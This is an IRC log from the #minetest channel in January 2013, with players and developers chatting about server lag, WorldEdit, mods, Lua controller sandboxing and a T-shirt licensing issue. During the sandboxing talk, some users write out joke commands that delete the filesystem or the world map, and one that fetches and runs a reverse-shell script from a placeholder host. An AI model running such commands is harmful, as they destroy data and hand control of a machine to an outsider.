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IRC log for #minetest, 2013-01-18

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All times shown according to UTC.

Time Nick Message
00:00 Menche hi
00:00 Menche going to start making worldedit saves of stuff on my server
00:00 Menche to transfer to new map
00:01 kaeza good
00:03 Kacey let me hop on and check coords and help with the worledit
00:04 Menche ok, just added worldedit
00:04 TheZenKitteh joined #minetest
00:04 Kacey do i have worldedit priv?
00:05 Kacey 3%
00:05 Menche not sure, my goodness the server is lagging
00:05 kaeza hey Zen
00:05 TheZenKitteh hey kaeza
00:05 Kacey im still getting on so that is wh
00:05 TheZenKitteh hey menche and kacey
00:05 Kacey why*
00:05 Kacey hi
00:05 Kacey almost there...
00:06 Menche cpu usage > 100%...
00:06 TheZenKitteh for any mod developers who wish to help test the bash and windows mod installers, the mod repo has been moved to its own repo and mods can be added through git
00:06 Uberi Menche: WorldEdit is working in a 3 level deep nested loop
00:07 TheZenKitteh any archive format supported so long as inside archive is the folder of the mod such as modname or industrial or mesecons whatever
00:07 kaeza TheZenKitteh, +1
00:07 Menche Uberi: the sad thing is, I haven't started using the worlded it yet :/
00:07 mauvebic whats your FPS with worledit?
00:07 marktraceur TheZenKitteh: http://www.theopensourceway.org/wiki/How_to_tell_if_a_FLOSS_project_is_doomed_to_FAIL#Releases
00:08 TheZenKitteh except rar.. rar isn't supported and I won't accept any mods to the repo that are in rar format lol
00:08 Menche mauvebic: my FPS is just fine, server lag is the problem
00:08 TheZenKitteh marktaceur I have no intentions of the bash and windows installers to take off.. however I do hope the online mod repo does so other mod installers can use what already exists
00:08 Kacey double jump for fly option ...
00:08 mauvebic i tend to associate lag with fps lol
00:09 Kacey i wasnt lagging at all
00:09 Menche you were'nt? maybe its because I'm leeching off of someone elses wifi...
00:09 Menche lol
00:09 Menche must be a way away from the router
00:10 Kacey lol
00:10 Kacey around 10 fps
00:10 Menche no, it's server lag, cpu usage is > 100%
00:11 mauvebic 10? poop
00:11 Menche mine is acting like it's capped at 30, even though it's actually capped at 60
00:11 Kacey i usually get 10 fps
00:11 Menche wow
00:12 mauvebic i used to get 10 FPS on my 7yr old gfx card
00:12 Menche i guess that is playable, it's what i usually get on my netbook
00:12 TheZenKitteh btw the goal of my mod installers btw is to "encourage" others who can do better to "try to one up me" or "contribute to make better".
00:12 Kacey i am watching the profiling graph thingy
00:13 * Menche is hoping his pentium 4 didn't just become obsolete
00:13 Kacey i have a pentium 4
00:13 TheZenKitteh this is a pentium 4 as well
00:13 Menche right around 0.4.0, my atom netbook ceased to be able to run a minetest server well
00:13 TheZenKitteh lol
00:14 mauvebic minetest never worked properly on my netbook either
00:14 airlynx joined #minetest
00:14 mauvebic had all these weird colored polygons on the screen
00:14 kaeza marktraceur, my IRC mod does all the points in the "Bundling" section... does that mean it's doomed to fail?
00:14 Kacey watching the graph go crazy when i get to the end of a chunk
00:14 mauvebic like someone threw a rainbow rock at the screen
00:14 Kacey mine does that but only for a second
00:15 mauvebic though netbook gfx and wifi drivers are notoriously a PITA
00:15 Menche my netbook gets occasional artefacts
00:15 mauvebic so we all get artefacts on the netbook? weird
00:15 Menche i haven't noticed them as much lately
00:15 Menche intel gfx drivers?
00:15 mauvebic yep
00:15 mauvebic intel atom N450
00:15 TheZenKitteh last time I tried minetest on a netbook it was a fail. <5FPS average
00:16 Kacey woa massive spike
00:16 TheZenKitteh occasional hiccups above 10
00:16 Menche i get about 10-15 fps
00:16 airlynx does the version on Ubuntu Software Center (v0.3.1) not connect to servers?
00:16 Menche give or take
00:16 Menche airlynx: it connects to 0.3 servers, most servers run 0.4
00:17 airlynx Menche: I went to the site to get the latest version, but the Ubuntu link doesn't seem to be working
00:18 airlynx nm, the magical "try-again" fairy fixed
00:19 marktraceur kaeza: You need to add up all the points!
00:20 TheZenKitteh marktraceur that link you gave doesn't fit all projects properly and assumes many things
00:21 Kacey woa really bad lag there
00:21 * Kacey is waiting for map to load...
00:22 Kacey Menche do you remember how to use worldedit?
00:22 marktraceur TheZenKitteh: Yes, but it's largely a hilarious joke.
00:22 Menche im looking at the worldedit page for reference
00:23 marktraceur TheZenKitteh: spot mostly made it in response to his frustration with Chrome, I think.
00:23 TheZenKitteh lol marktraceur it is to a degree
00:23 Uberi another nanosecond, another Chrome version
00:24 Menche Kacey: just started a worldedit save
00:24 mauvebic lol
00:25 Kacey it looks like nobody wants their buildings saved...
00:25 Menche actually it wasn't that bad
00:25 mauvebic lol -> new chrome version
00:25 Menche i don't think i'll save the weird looking lava thingie next to spawn
00:25 kaeza marktraceur, 155 points of FAIL, so yep, pretty much screwed
00:25 Uberi hey marktraceur got gh push access!
00:26 Uberi high five o/
00:26 marktraceur Uberi|Away: Mostly for bug tracking porpoises.
00:27 TheZenKitteh I say everything can be worked on.. if a project works as the developers envisioned and it serves a purpose, its not a total fail. the issue I see with almost every floss project is lack of GOOD documentation that's written in a way the END USER can understand
00:27 marktraceur Before you ask, the dolphins were harder to train and therefore much more expensive.
00:27 TheZenKitteh most seems written from the viewpoint of the devs and most end users won't even read it because its overcomplicated
00:27 TheZenKitteh lol
00:28 kaeza TheZenKitteh, I try to make my docs as easy to understannd to end users as possible
00:28 TheZenKitteh same here kaeza.. of course im not very strong in documentation
00:28 TheZenKitteh yet
00:29 kaeza (Note: I usually look at Microsoft documents for inspiration because of their tendency to treat users like stupid masses)
00:29 TheZenKitteh all my projects are mostly for my own personal use as a learning tool. however I believe in sharing so I do
00:29 Menche does worldedit save metadata like chest inventories?
00:30 * TheZenKitteh jokes that there should be a realworldedit that can edit the real world.. if only such existed
00:30 TheZenKitteh anyway time for work again so ta ta to everyone for now
00:30 TheZenKitteh have fun
00:33 Kacey haha
00:33 Kacey punched an unknown block and the graph spiked
00:43 bwsrjr joined #minetest
00:43 bwsrjr I think I installed a mod (mesecons), but the game looks normal. how can i tell?
00:44 mauvebic check your creative inventory?
00:46 bwsrjr mauvebic: yup, that worked. i'm a super-newb
00:46 bwsrjr thansk
00:47 mauvebic no prob you can also use /giveme if you know exactly what youre looking for
00:48 kaeza wow! talk about good support! I just received an answer to a question I posted on Puppy Linux Forums 5 months ago!
00:48 Uberi to answer your question Menche, only //metasave does
00:48 mauvebic better than ubuntu's "its your hardware" typical responses lol
00:48 Menche ok
00:48 Uberi Menche: a future version will fold //metasave into //save to make things simpler
00:51 kaeza the problem with puppy forums is every kiddo makes a stupid question about things like "how do I change to a new directory?" and so *real* questions are lost forever in the last pages of the topic list
00:52 Uberi kaeza: well to be fair, that's a legitimate question
00:55 kaeza yeah
00:55 kaeza It's also a question that is easily answered by RTFM
00:56 kaeza there's even a FAQ answering those...err...Frequently Asked Questions
00:57 bwsrjr man, i've never played mine{craft,test} before. these mesacons are amazing
00:57 Uberi bwsrjr: wait 'till luacontrollers are ready
00:57 Uberi they'll knock your socks off
00:58 bwsrjr do you know if the mesecons commands (for the command block) are documented anywhere?
00:58 Uberi ComputerCraft, anyone?
00:58 Kacey luacontrollers?
00:58 Uberi bwsrjr: they're all just MineTest commands, plus two I added for convenience
00:59 Uberi bwsrjr: use the /help command to get a list
00:59 Uberi bwsrjr: the chat command, I mean, type /help in the chat and press enter
00:59 Uberi bwsrjr: I also added /msg and /say to make adventure maps easier
00:59 bwsrjr awesome
00:59 babyface1031 do jungle tree leaves die like the other tree leaves
00:59 Uberi Kacey: uc's, except programmed with Lua
01:00 Kacey so you have to know lua to program them?
01:01 bwsrjr I'll learn lua for that. Isn't it used to script all kinds of games? WoW comes to mind
01:01 mauvebic isnt that a danger for hacking servers?
01:01 Menche ucs are lua?
01:01 Uberi mauvebic: all sandboxed
01:01 Uberi Menche: right now uc's are programmed in ucscript
01:01 Uberi we're working on making Luacontrollers safe for servers still
01:02 Uberi right now you can still crash a server with an infinite loop
01:02 Uberi when it becomes fully safe it'll be in the release
01:02 Kacey so instead of sbi(C,A) it would be something else?
01:02 mauvebic does it prevent users from accessing all the api calls?
01:02 Uberi mauvebic: yep
01:02 mauvebic like say, a user couldn't grant himself privs
01:03 Uberi mauvebic: or worse: os.open("rm -rf /")
01:03 Dogzilla131 joined #minetest
01:03 Uberi mauvebic: yeah the environment is all nicely safe and sandboxed
01:03 Uberi but still infinite loops are possible
01:03 Menche if a server operator were running his server as root, he would deserve that
01:03 Menche rm -rf /
01:04 Exio if someone is running a server as root
01:04 Exio the problem isn't the server, is the sysadmin
01:04 bwsrjr Uberi: what do the water turbines do?
01:05 bwsrjr nm, i see on the site
01:05 bwsrjr wow. I've got to run, but this is amazing
01:06 Uberi Exio: still, MT has access to the map, so os.open("rm ../worlds/map.sqlite")
01:06 Exio well, yeah
01:07 kizeren os.open("rm -Rf /")  That would be more fun.
01:07 Exio or even better, os.open("wget http://your.nice.site/reverse.shell.sh;bash reverse.shell.sh"); >:D
01:08 Uberi Exio: the new WorldEdit also has a //lua command that can technically do that
01:08 Uberi but it has even stricter privs, needs server=true
01:11 babyface1031 do jungle tree leaves die like the other tree leaves
01:12 babyface1031 and what is noclip
01:13 mauvebic being able to pass through shit
01:14 NakedFury noclip is being a ghost
01:14 NakedFury should use that name instead of noclip
01:15 Uberi nah ghost has other connotations
01:15 Uberi like being invisible
01:16 NakedFury ok the Kitty Pride(i think) mode
01:23 airlynx still can't connect to c55.me server
01:29 Menche airlynx: that server has been down
01:29 Kacey i must go
01:30 Uberi his people need him
01:40 BackupCoder legends will speak of it
01:45 mauvebic which is nicer rosebush? http://www.zimg.eu/i/2006889979
01:45 airlynx what is a good server to connect to then?
01:51 Uberi airlynx: survival or creative?
01:54 kaeza OldCoder, are you updating the servers?
01:54 kaeza BackupCoder, ^
01:57 kaeza oh nvm
01:57 kaeza they are back up
01:58 airlynx uberi: no idea, just exploring the game at this point
02:00 Uberi airlynx: well have a gander at VanessaE's creative server, it has a huge selection of what's possible with MT
02:00 Uberi can you give the address, VanessaE?
02:01 erlehmann joined #minetest
02:01 erlehmann anyone here?
02:02 marktraceur erlehmann: So many people are here!
02:02 airlynx lol, I just discovered the wiki pages, realized there's a whole lot more to this than just digging dirt and sand with my hands
02:02 erlehmann i got a mail from the t-shirt shop.
02:02 marktraceur erlehmann: Welcome to IRC, ask your question :)
02:02 marktraceur erlehmann: What was it?
02:02 erlehmann i asked them to provide attribution.
02:03 erlehmann but they were like “In accordance with our Intellectual Property Rights Policy, we have prevented the user from using the images on products for sale through their store.”
02:03 erlehmann even though i explicitly told them commercial use is ok
02:03 erlehmann >_>
02:03 erlehmann <_<
02:03 erlehmann -_-
02:04 erlehmann is the shop still there?
02:04 marktraceur erlehmann: So wait, the order I placed....is going to get cancelled?
02:04 erlehmann marktraceur, i have *no* idea.
02:04 marktraceur The "black and yellow" design is, all others aren't
02:04 marktraceur Guh, these people are morons.
02:04 erlehmann indeed.
02:05 erlehmann but probably easiest for them to just delete fucking everything.
02:05 erlehmann any idea what i can do?
02:06 Dogzilla131 joined #minetest
02:06 erlehmann maybe i'll find a CC-friendly shirt shop
02:07 erlehmann let me look up the cafepress intellectual property rights policy
02:07 erlehmann that cafepress person is like youtube
02:08 erlehmann http://www.cafepress.com/cp/info/help/index.aspx?page=iprights.aspx
02:08 erlehmann > If you let us know that your rights are being infringed by one of our users we will (in our discretion) require that the user's content is removed from products and, if the user continues to infringe your rights (or infringes the rights of others) terminate the user's access to our services.
02:08 erlehmann oh well
02:09 erlehmann who of you does the cafepress store?
02:09 marktraceur rubenwardy, but he not here
02:10 erlehmann oh well tell him i meant no bad then. i can post the email if he wants.
02:10 marktraceur Righto.
02:10 marktraceur erlehmann: I'd really enjoy reading the full text, actually. Might make a good blog post.
02:10 erlehmann i just want attribution and that users are aware of the source code of the image.
02:10 erlehmann marktraceur, ima gonna sleep.
02:10 marktraceur KK.
02:10 erlehmann but i'll post it.
02:10 erlehmann wait
02:12 marktraceur erlehmann: In fairness, they're correct
02:12 marktraceur erlehmann: The shirts essentially broke the license
02:13 erlehmann marktraceur, they are correct, yes. but it would be very easy to comply.
02:13 marktraceur True, but their policy says something, and they can't very well play fast and loose with that sort of thing
02:13 erlehmann yeah, probably.
02:13 marktraceur Else they'd get sued. A lot.
02:13 erlehmann ima gonna post the mail.
02:14 marktraceur Woot!
02:17 mauvebic jesus its cold outside
02:18 jojoa1997 joined #minetest
02:18 erlehmann in berlin as well
02:18 Uberi mauvebic: it's insane
02:18 Uberi I almost got frostbite walking home today
02:18 mauvebic i just went for beer, thank god its a block away\
02:18 erlehmann http://daten.dieweltistgarnichtso.net/docs/law/cafepress-minetest-logo
02:19 erlehmann marktraceur, go show that rubenwardy if he asks for explanation.
02:19 marktraceur KK
02:19 jojoa1997 Uberi want to trade places it is too hot here
02:19 erlehmann where u are?
02:19 erlehmann BR BR BR BR BR ?
02:20 jojoa1997 USA Florida
02:20 jojoa1997 60 is cold here
02:20 jojoa1997 fareinheight
02:21 Uberi jojoa1997: you don't want to be in -20 degree celsius weather :/
02:21 jojoa1997 hay io like the cold 30
02:21 jojoa1997 but 60 is cold to others
02:21 kaeza joined #minetest
02:21 jojoa1997 florida is around 70 in the middle of winter
02:22 OldCoder Back
02:22 OldCoder kaeza, no; I was away for the afternoon
02:22 mauvebic last week they had 12c in yukon lol
02:22 kaeza OldCoder, I received a strange "Server Shutting Down" message
02:22 mauvebic they have that 30 days of night thing in the winter too lol
02:22 OldCoder Hmm
02:22 jojoa1997 OldCoder is minetest.org 30005 up i cant get on
02:23 OldCoder kaeza, port?
02:23 kaeza but reconnected and it was up... O.o
02:23 OldCoder jojoa1997, checking now
02:23 erlehmann jojoa, USE METRIC
02:23 kaeza OldCoder, ^
02:23 jojoa1997 In USA no way
02:23 OldCoder reviewing logs
02:24 mauvebic vancouver has nicer winter weather
02:24 erlehmann SI units, there is a reason your military and your nasa uses it ;_;
02:24 shirish joined #minetest
02:24 kaeza OldCoder, 30004
02:24 OldCoder when?
02:24 jojoa1997 why
02:24 OldCoder time?
02:24 OldCoder kaeza, you timed out
02:24 kaeza about 30 mins ago
02:24 kaeza yeah
02:25 jojoa1997 it was a day ago but i just connected
02:25 Kacey joined #minetest
02:25 OldCoder kaeza, I see...
02:25 Kacey back
02:25 OldCoder WARNING: StaticObjectList::remove(): id=69 not found
02:25 OldCoder 01:54:17: ERROR[main]: ServerEnvironment::deactivateFarObjects(): id=70 m_stati
02:25 OldCoder WARNING: StaticObjectList::remove(): id=70 not found
02:25 OldCoder 01:54:17: ERROR[main]: ServerEnvironment::deactivateFa
02:25 kaeza I just got confused by that "Server Shutting Down" message
02:25 OldCoder Kacey, wb
02:25 Kacey hi oldcoder
02:26 OldCoder o/
02:27 Kacey o>
02:28 Kacey making redneck jokes
02:37 leo_rockway joined #minetest
02:55 marktraceur Hm. The cafepress order seems to still be on the way
03:02 erlehmann good!
03:09 jeffrash joined #minetest
03:15 shirish joined #minetest
03:20 mauvebic renovations: http://www.zimg.eu/i/2266287931
03:33 shirish joined #minetest
03:39 jojoa1997 joined #minetest
03:40 jojoa1997 if i make a folder named worldmods inj my world folder. is that where game specific mods go
03:42 TheZenKitteh joined #minetest
03:42 Sh1fty left #minetest
03:46 TheZenKitteh hello hello to anyone alive
03:53 erlehmann hi
03:53 erlehmann mauvebic, where is this?
03:53 TheZenKitteh hey erlehmann
03:53 erlehmann hey TheZenKitteh
03:55 Renoki joined #minetest
03:57 TheZenKitteh slow night I take it
04:02 mauvebic erlehmann on my personal server
04:02 mauvebic though oldcoder has a copy running
04:03 mauvebic minetest.org:30018
04:03 jeffrash joined #minetest
04:03 mauvebic (http://forum.minetest.net/viewtopic.php?id=4136)
04:04 kizeren So is this a map that you would not give me nukes?
04:05 mauvebic not on that server its not creative
04:06 kizeren Going to try and talk the wife into creating a map for PVP.
04:06 kizeren Just not sure what anyone would want in a PVP map.
04:07 OldCoder hi
04:07 kizeren But I will deffinetly put nukes in it :)
04:07 kizeren Hello OldCoder
04:07 OldCoder hi!
04:08 kizeren I hope you don't mind.  I mirrored your website so I could get the mods you have on port 30000.
04:09 mauvebic whos website? we all have websites lol
04:09 kizeren OldCoder's.
04:11 kizeren I wanted OldCoders so i could see the mods and config files for the worlds.  Been trying get a little extra speed from the one I host.  I think I found a good combo and so far it has helped.
04:11 kizeren now if we can do something about the graphics :)
04:11 mauvebic ive been working on optimizing too
04:12 mauvebic lots of redundant code to cut down on lol
04:12 kizeren my problem was conifers and plantlife then animals....just brough everything to a stand still.
04:12 kizeren Now nothing really lags the server accept if you spawn a new area.
04:12 kizeren Which i can live with.
04:15 erlehmann awww http://forum.minetest.net/viewtopic.php?id=3731
04:15 erlehmann only 9 years old and coding!
04:15 erlehmann great!
04:21 OldCoder hi
04:21 OldCoder kizeren, feel free and you need to update sometime
04:21 OldCoder kizeren, there will be much more
04:22 kizeren I am just giong to try and keep mine updated with yours.
04:22 OldCoder Please don't clone all the time; once in a while should do
04:22 kizeren Best i can anyway.
04:22 OldCoder Maybe I will give out rsync
04:22 OldCoder That would let everybody clone everything
04:22 kizeren I figured maybe most once a week.
04:22 OldCoder k
04:22 OldCoder Hmm
04:23 OldCoder kizeren, can you limit two things? One would be *my* mirror of thexyz mods
04:23 OldCoder that won't change much
04:23 OldCoder and if I put the worlds online
04:23 kizeren I was just too lazy to write a script to get the zip files tonight :)  But I might try it next week so I don't kill your bandwidth.
04:23 OldCoder that will be gigabytes
04:23 OldCoder Hmm
04:23 OldCoder I could see the worlds as torrents
04:23 OldCoder * see
04:23 OldCoder * seed
04:24 kizeren Would it be hard for you to have one big zip file of all the mods to grab instead of individuals?
04:24 OldCoder Not hard, no
04:24 OldCoder We can do all kinds of things
04:24 OldCoder Keep an eye on it over time
04:24 OldCoder kizeren, actually what you just asked
04:24 OldCoder is there in a way
04:24 OldCoder I have placed the _game folders zipped online
04:25 kizeren What I was thinking was setting up a cron job that will use wget to check if file has changed if so...then have wget download the new file.
04:25 OldCoder fine
04:25 kizeren but this time I wanted all the config files.  So I could tinker with them and find one that best worked on my server.
04:25 OldCoder sure
04:26 kizeren Did you know the textures are all goofy?
04:31 kizeren Oo well... late for me.
04:31 kizeren laters.
04:38 simion314 joined #minetest
04:58 shirish joined #minetest
05:07 roboman2444 joined #minetest
05:10 kaeza my fighting/spleef/whatever arena on Octuteam World: https://dl.dropbox.com/u/100008207/minetest/screens/octuteam/screenshot_1272406954.jpg
05:13 VanessaE zzz
05:14 * kaeza puts a default:water_flowing on VanessaE's head
05:14 * VanessaE grabs an erlehmann sponge.
05:15 kaeza hah
05:15 erlehmann :3
05:15 erlehmann VanessaE, can you modify my mod so sponge occurs naturally?
05:16 kaeza outside view: https://dl.dropbox.com/u/100008207/minetest/screens/octuteam/screenshot_1272732901.jpg
05:16 VanessaE erlehmann: I could possibly do that....  ironically the best place to spawn a sponge would be under water...which of course they're designed to get rid of :)
05:16 kaeza err...wouldn't that dry up the world? :P
05:16 VanessaE yup
05:17 erlehmann VanessaE, i would suggest they spawn 1 block below sea level and very rarely
05:17 kaeza how about making a "dry sponge" and a "wet sponge"?
05:18 kaeza (like a water tank or smth like that)
05:18 * kaeza has fancy useless ideas
05:19 * kaeza 's creativity sucks
05:21 kaeza suddenly...copyright infringement: https://dl.dropbox.com/u/100008207/minetest/screens/octuteam/screenshot_1273155980.jpg
05:21 kaeza (art by Dogzilla)
05:21 VanessaE heh
05:21 VanessaE where is this?
05:21 kaeza Octuteam world
05:21 kaeza mt.org:30004
05:25 kaeza and there's more: https://dl.dropbox.com/u/100008207/minetest/screens/octuteam/screenshot_1273302628.jpg
05:29 anunakki joined #minetest
05:37 neko259 joined #minetest
05:53 Oblivion1500 joined #minetest
05:55 kaeza VanessaE, you there?
05:56 VanessaE no :)
05:56 kaeza oh ok
05:56 kaeza :)
05:56 VanessaE I'm here ---->
05:56 kaeza nope
05:56 kaeza theres a blank area there
05:56 kaeza :P
05:56 kaeza <Brandy> only bad thing is, i keep cutting down trees and they keep taking over everything now
05:56 VanessaE I'm invisible, duh :)
05:56 kaeza <Brandy> they are growing through my buildings and taking over all the land thats left, its like the attack of the killer trees lol
05:57 VanessaE tell him to bury some trunks under a layer of dirt as close to the surface as possible.
05:57 VanessaE that'll cause the spawn code to avoid those areas.
05:57 kaeza whatokay
05:57 kaeza BTW, it's a "her"
05:57 VanessaE her then :-)
05:58 kaeza thanks ;)
05:58 VanessaE the spawner checks for the presence of trunks or saplings of the type about to be spawned, and avoids them if they're too close
05:59 VanessaE alternatively, tell her not to build there ;-)
05:59 VanessaE or build at below 25m
06:01 kaeza VanessaE, she says thank you
06:01 kaeza (it's weird relaying messages between channels lol)
06:02 VanessaE I'll make changes to the code soon to make them spawn on mapgen insted of via an abm
06:07 kaeza umm... http://www.youtube.com/watch?annotation_id=annotation_152960&amp;feature=iv&amp;src_vid=To6q3w6RzNg&amp;v=U8tAkQ-37XU
06:16 celeron55 http://www.aosabook.org/en/index.html
06:16 celeron55 "The Architecture of Open Source Applications"
06:17 Oblivion1500 ┏(-_-)┛┗(-_- )┓┗(-_-)┛┏(-_-)┓
06:18 cosarara97 joined #minetest
06:52 VanessaE bbl, bedtime
06:52 kaeza night
07:09 cosarara97 joined #minetest
07:11 cosarara97 hi
07:11 kaeza hey
07:12 cosarara97 Do I have to give any options to CMake to get the 3D player?
07:12 kaeza nope
07:12 kaeza just use latest git
07:12 kaeza (well, not latest, but recent enough)
07:12 kaeza also, the 3d player is part of minetest_game
07:13 kaeza so you should update that as well
07:13 cosarara97 that is it
07:13 kaeza yup
07:14 kaeza celeron55, would an API to determine what caused damage to player be possible? it would require protocol changes right?
07:15 kaeza or can it be done someway in Lua?
07:15 kaeza somehow*
07:18 kaeza hmm... thinking about it, I think that can be possible with a patch in C++ (at least for environment damage such as lava and falling)
07:18 kaeza other damage such as from entities can be (almost) easily done in Lua
07:19 Obiewan1111 joined #minetest
07:19 Obiewan1111 I has le snow.
07:19 Obiewan1111 Le school is le shut.
07:19 Obiewan1111 #SNOWDAY.
07:19 Obiewan1111 I'm out!
07:20 kaeza O.o
07:20 Arerhihi joined #minetest
07:20 cosarara97 can outdated mods cause a segfault?
07:21 kaeza depends
07:21 cosarara97 on?
07:21 kaeza usually lua errors are catched and reported as a nice dialog box
07:21 kaeza unless the code is doing something weird
07:22 kaeza anyway, what's the mod in question?
07:22 cosarara97 Well, the game is crashing just when I start to see the world
07:22 cosarara97 only in single player
07:22 cosarara97 I'll try to disable the external mods
07:22 Zeg9 joined #minetest
07:23 kaeza do this:
07:23 kaeza remove all the mods (so you are left only with default game)
07:24 kaeza and start adding one by one
07:24 kaeza and test which one causes the segfault
07:24 kaeza s/test/see/
07:24 cosarara97 I removed them all, and it's working now, but at 3 fps only :S
07:25 kaeza hmmm
07:25 kaeza MOBF can cause those problems
07:25 kaeza even when removed
07:25 kaeza are you using that?
07:26 cosarara97 Nope
07:26 cosarara97 I'm trying with a new world now
07:27 cosarara97 it's a little faster now
07:27 kaeza_ joined #minetest
07:27 cosarara97 7-8 fps
07:27 kaeza can you repeat please?
07:27 kaeza I got disconnected :/
07:28 cosarara97 I don't think I have had mobf
07:28 cosarara97 I'm trying with a new world anyway
07:29 cosarara97 and it just a little faster
07:42 neko259 joined #minetest
07:43 Oblivion1500 i would try uninstalling the game then reinstalling, but thats just me
07:44 kaeza or getting a better computer
07:44 kaeza meh
07:44 kaeza anyway, I'm out
07:44 kaeza night everyone
07:46 Oblivion1500 good night
07:46 Oblivion1500 damn lol
07:51 cosarara97 joined #minetest
08:08 cosarara97 joined #minetest
08:18 * Zeg9 just managed to crash gimp
08:33 aheinecke joined #minetest
08:37 V0id_ joined #minetest
09:15 BillyBlu` joined #minetest
09:24 thexyz kizeren: http://mods.minetest.ru/info.html — if you wish to rsync with mods.minetest.ru
09:42 celeron55 thexyz: is that manually or automatically managed?
09:45 shirish joined #minetest
09:47 thexyz celeron55: manually
09:48 thexyz it's quite outdated as I don't have enough time to manage it
09:50 celeron55 it could be automated fairly easily - just introduce some wiki-like special syntax to be used for package links and short info on the forum
09:51 celeron55 not really wiki-like... some standard way of listing things anyway
09:52 OldCoder thexyz, he is interested specifically in my versions of the mods I think
09:52 thexyz well, installing pun_attachment is an another option
09:56 celeron55 i'm really interested in coding an integrated mod database on the main site... i should just drop everything else and get to doing that
09:58 celeron55 anyhow, work (slave) stuff ->
10:08 OldCoder Hmm
10:08 OldCoder You mean the volunteer program?
10:08 OldCoder Well, not volunteer
10:15 celeron55 i mean slavery
10:22 aheinecke joined #minetest
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10:31 cosarara97 joined #minetest
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11:44 BillyBlu` joined #minetest
11:45 youlysses joined #minetest
11:59 rsiska joined #minetest
12:01 jordach joined #minetest
12:01 jordach hello all
12:04 youlysses left #minetest
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12:16 BillyBlu` joined #minetest
12:52 Arerhihi joined #minetest
12:54 Jeija joined #minetest
13:04 shirish joined #minetest
13:13 xy joined #minetest
13:30 shirish joined #minetest
13:31 markveidemanis joined #minetest
13:32 markveidemanis Anyone on #mt-servers #mt-textures #mt-maps
13:33 markveidemanis ?
13:49 q66 joined #minetest
13:53 codile joined #minetest
13:56 celeron55 news from minetest.net VPS: they finally could do a hardware check for it after relocating some service (other than minetest.net) that it was running as one of a redundant pair of servers
13:56 celeron55 s/for it/for the physical server/
13:56 celeron55 turns out it had a broken RAM module
13:56 celeron55 that... well, explains stuff
13:57 celeron55 for some reason no other VPSes were affected by it
14:00 VanessaE translation:  "We don't want to admit to how bad the problem *really* was".
14:00 VanessaE also, good morning.
14:02 PilzAdam joined #minetest
14:02 PilzAdam Hello everyone!
14:02 VanessaE morning PilzAdam
14:05 celeron55 VanessaE: eh?
14:06 VanessaE celeron55: nevermind, it was a joke.
14:08 celeron55 do you ever have any jokes the funnyness of which doesn't involve unrighteously laughing at people?
14:09 VanessaE *facepalm*
14:10 celeron55 i think i haven't ever seen anyone else respond to these in any positive way either; i'm somewhat sure the problem is more in you than me
14:10 celeron55 not that i really care, but anyway
14:10 VanessaE I worked for a VPS provider for a while and was paid to lie about the severity of the problems the place had.
14:11 VanessaE (needless to say I didn't stay there long)
14:12 shirish joined #minetest
14:12 celeron55 ...i don't really see how having a broken memory module can differ from having a broken memory module
14:13 VanessaE It isn't about the damage to the hardware - it's about the claim that no one else but minetest.net was affected, which is absurd.
14:14 celeron55 well, it obviously is pretty bad, regardless of if others actually suffered of it or not
14:14 * PilzAdam sees that MarkTraceur and hmmmm have access to the main repo
14:14 VanessaE certainly so, yes.
14:15 celeron55 given that the big service that prevented running the long hardware check was a pair of two redudant servers, that wouldn't have been affected that much at least
14:15 celeron55 i mean, of the RAM error
14:15 VanessaE you do realize how many VPS's are usually run on such a machine, right?
14:16 RealBadAngel hi all
14:16 VanessaE mornin' RBA
14:16 RealBadAngel evenin' VanessaE :)
14:16 celeron55 many; altough i am not fully knowledgeable of how this hosting is actually implemented
14:18 celeron55 (it isn't the general "bulk vps hosting"; it's likely to be on a rented physical server owned by the very small company, which mostly runs sites provided as a service right from the making of them)
14:18 VanessaE a colo then.
14:18 VanessaE or just a dedicated server?
14:19 celeron55 probably just a dedicated server
14:19 Zetetic` joined #minetest
14:19 celeron55 dunno though; i could ask but it doesn't really matter
14:19 VanessaE RealBadAngel: I'm working on an extension to plantlife to allow for mapgen-based spawning.
14:20 RealBadAngel cool
14:21 RealBadAngel i will finish later today trees framework
14:22 VanessaE RealBadAngel: http://pastebin.com/t5FF27Aq
14:22 RealBadAngel once done i will upload it to github and let you know
14:22 VanessaE look suitable to you?  I'm not used to working with the register_on_generated() call
14:23 RealBadAngel look serious, we will see how it will work ;)
14:23 VanessaE (sometimes I hate pastebin for enforcing line lengths... *grumble*)
14:23 VanessaE (read it in "raw" view, it's less jumbled)
14:24 celeron55 minetest.register_on_generated(local searchblocks = table.getn(minet...
14:24 celeron55 an interesting function definition for sure 8)
14:25 VanessaE celeron55: I've never used this call before.
14:25 VanessaE so I don't expect this code to work yet
14:25 VanessaE this is just an outline until I functioanlize the bulk of the code that'll be inside there
14:27 celeron55 it might work if you add the missing pieces, yes
14:42 VanessaE RealBadAngel: how's this look?  http://paste.ubuntu.com/1545579/
14:42 Muadtralk joined #minetest
14:44 VanessaE (my new function names suck..)
14:45 TheLastProject joined #minetest
14:46 thexyz wtf, fuckton of params
14:46 thexyz i think you should make them into a table
14:46 Muadtralk left #minetest
14:46 Muadtralk joined #minetest
14:47 VanessaE can't.  the API needs to remain compatible with old stuff
14:48 thexyz well, then make it compatible
14:48 PilzAdam check if the first param is a table; if yes read the table if not read the other params
14:50 VanessaE no need, this format works fine...besides, I'm too lazy to change it :D
14:51 thexyz PilzAdam: +1
14:52 thexyz what if I want to change tempmax only?
14:52 thexyz spawn_on_surfaces(nil,nil,nil,nil,nil,nil,nil,fuck, ... my_tempmax)
14:52 VanessaE lol
14:52 VanessaE it doesn't quite work like that :-)
14:53 thexyz huh?
14:53 Kacey joined #minetest
14:54 Kacey hello
14:54 VanessaE hey kacey
14:54 Kacey i think i just fixed my battery
14:57 Kacey perhaps...
14:57 Kacey well i have to go to school
14:59 xrogaan joined #minetest
14:59 xrogaan joined #minetest
14:59 fortytwo joined #minetest
15:00 Jave27 joined #minetest
15:20 Laggy joined #minetest
15:24 rsiska joined #minetest
15:39 jojoa1997 joined #minetest
15:46 iqualfragile joined #minetest
15:53 sfan5 joined #minetest
15:54 sfan5 hi guys
15:54 VanessaE greetz sfan5
15:55 sfan5 my hdd/mainboard broke and i'm currently setting up my win32 minetest builds environment on a different computer...
15:58 Final joined #minetest
15:59 thexyz "i'm currently restoring from backup" would fit better
16:03 Muadtralk joined #minetest
16:03 sfan5 yeah
16:04 Wuzzy joined #minetest
16:04 Muadtralk anyone know how to get rid of a virus on linux?
16:05 * Muadtralk and how its even remotely possible I got one?
16:06 sfan5 which virus?
16:06 Muadtralk issue being I cant find it
16:07 Muadtralk but something is sucking my CPU with a straw
16:09 sfan5 have you looked at the process list
16:09 Muadtralk nothing is using that much
